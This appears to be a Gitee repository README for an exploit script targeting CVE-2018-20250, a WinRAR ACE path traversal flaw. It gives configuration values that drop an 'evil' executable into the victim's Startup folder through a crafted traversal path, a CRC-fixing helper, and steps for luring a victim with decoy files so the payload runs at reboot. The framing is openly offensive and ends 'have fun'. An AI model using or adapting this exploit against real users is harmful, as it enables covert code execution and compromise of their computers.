1 Star 0 Fork 0

soapffz / CVE-2018-20250

Create your Gitee Account
Explore and code with more than 8 million developers,Free private repositories !:)
Sign up
This repository doesn't specify license. Please pay attention to the specific project description and its upstream code dependency when using it.
Clone or Download
README.md 1.97 KB
Copy Edit Web IDE Raw Blame History
WyAtu authored 2019-02-22 13:02 . Update README.md

exp for Extracting Code Execution From Winrar

poc by Ridter

how to use ?

you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!

  1. set the values you want
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...
  1. run the exp, exp generated the test.rar automatically

  1. if the victim opens the test.rar, he will see the file hello.txt and world.txt, you can also add more files, more attractive files.

  1. when he unpacks the file, the victim's user startup directory will have one more file named hi.exe, actually it's a calc.exe. when he restart the computer, the hi.exe will run.

have fun! :)